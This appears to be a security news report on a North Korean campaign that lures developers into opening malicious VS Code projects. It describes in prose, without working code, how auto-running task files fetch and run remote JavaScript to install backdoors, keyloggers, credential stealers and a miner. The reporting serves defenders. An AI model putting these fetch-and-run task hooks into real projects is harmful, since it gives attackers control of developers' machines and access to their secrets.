The North Korean threat actors behind the long-running Contagious Interview campaign have now been seen abusing malicious Microsoft Visual Studio Code (VS Code) projects as initial access lures to deliver a backdoor to developer workstations and other endpoints.

This update shows ongoing refinement of a technique first documented in December 2025, according to Jamf Threat Labs.

“This activity involved the deployment of a backdoor implant that provides remote code execution capabilities on the victim system,” security researcher Thijs Xhaflaire said in a report shared with The Hacker News.

First reported publicly by OpenSourceMalware last month, the intrusion pattern centers on instructing targets to clone a GitHub, GitLab, or Bitbucket repository and open the project in VS Code as part of what is framed as a technical interview or job assessment.

The objective is to abuse VS Code task configuration files to trigger execution of malicious payloads hosted on Vercel domains, chosen based on the victim host’s operating system. The task is configured to run automatically whenever that file, or any file in the project directory, is opened in VS Code by using the “runOn: folderOpen” option. This chain ultimately deploys BeaverTail and InvisibleFerret.

Later waves of the campaign have been found to hide multi-stage droppers inside task configuration files by masquerading the malware as benign spell-check dictionaries. This acts as a fallback when the task cannot obtain the payload from the Vercel domain.

Consistent with earlier activity, obfuscated JavaScript embedded in these files runs as soon as the victim opens the project in the integrated development environment (IDE). It reaches out to a remote server (“ip-regions-check.vercel[.]app”) and executes whatever JavaScript code is returned. The final stage of the sequence is another heavily obfuscated JavaScript payload.

Jamf reports an additional evolution in this campaign: the operators are using a previously undocumented infection path to deliver a backdoor with remote code execution on compromised hosts. The initial trigger is unchanged – the sequence starts when a user clones and opens a malicious Git repository in VS Code.

“When the project is opened, Visual Studio Code prompts the user to trust the repository author,” Xhaflaire explained. “If that trust is granted, the application automatically processes the repository’s tasks.json configuration file, which can result in embedded arbitrary commands being executed on the system.”

“On macOS systems, this results in the execution of a background shell command that uses nohup bash -c in combination with curl -s to retrieve a JavaScript payload remotely and pipe it directly into the Node.js runtime. This allows execution to continue independently if the Visual Studio Code process is terminated, while suppressing all command output.”

The JavaScript payload hosted on Vercel contains the primary backdoor logic, implementing a persistent execution loop that collects basic host details and interacts with a remote server to support remote code execution, system fingerprinting, and ongoing C2 communication.

In one observed case, the Apple device management team noted that additional JavaScript instructions were executed around eight minutes after the initial compromise. The newly fetched JavaScript is built to beacon to the server every five seconds, execute extra JavaScript, and scrub traces of its own activity when instructed by the operator. Based on inline comments and language style in the source, the script is suspected to have been authored or assisted by an artificial intelligence (AI) tool.

DPRK-linked threat actors have a documented focus on software engineers, especially those in cryptocurrency, blockchain, and fintech environments, because these users often hold privileged access to financial assets, wallets, and core technical infrastructure.

Compromising these users’ accounts and endpoints can give the attackers access to source code, intellectual property, internal services, and direct paths to steal digital assets. The steady adjustment of tradecraft here appears aimed at increasing success rates for both espionage and financially motivated activity in support of the heavily sanctioned regime.

The development comes as Red Asgard detailed its investigation into a malicious repository that uses a VS Code task configuration to retrieve obfuscated JavaScript, which then delivers a full-featured backdoor named Tsunami (aka TsunamiKit) together with an XMRig cryptocurrency miner.

Another publication from Security Alliance last week described the same VS Code task abuse in a case where an unidentified victim was contacted via LinkedIn. The adversaries posed as the chief technology officer of a project called Meta2140 and shared a Notion[.]so link containing a technical assignment and a URL to a Bitbucket repository delivering the malicious code.

Notably, the attack chain is built with two additional fallback paths: pulling in a malicious npm dependency named “grayavatar” or executing JavaScript responsible for retrieving a more complex Node.js controller. That controller runs five separate modules to capture keystrokes, take screenshots, scan the system home directory for sensitive files, replace wallet addresses copied to the clipboard, steal browser credentials, and maintain a persistent connection to a remote server.

The malware then sets up a dedicated Python environment through a stager script, enabling further data theft, XMRig-based cryptocurrency mining, keylogging, and AnyDesk deployment for remote interactive access. The Node.js and Python components are referred to as BeaverTail and InvisibleFerret, respectively.

For defenders, these observations show that the state-aligned operators are actively testing and running several delivery mechanisms in parallel to maximize compromise rates.

“This activity highlights the continued evolution of DPRK-linked threat actors, who consistently adapt their tooling and delivery mechanisms to integrate with legitimate developer workflows,” Jamf said. “The abuse of Visual Studio Code task configuration files and Node.js execution demonstrates how these techniques continue to evolve alongside commonly used development tools.”

Found this article useful from a defensive perspective? Follow us on Google News, Twitter and LinkedIn to keep up with more in-depth coverage we post.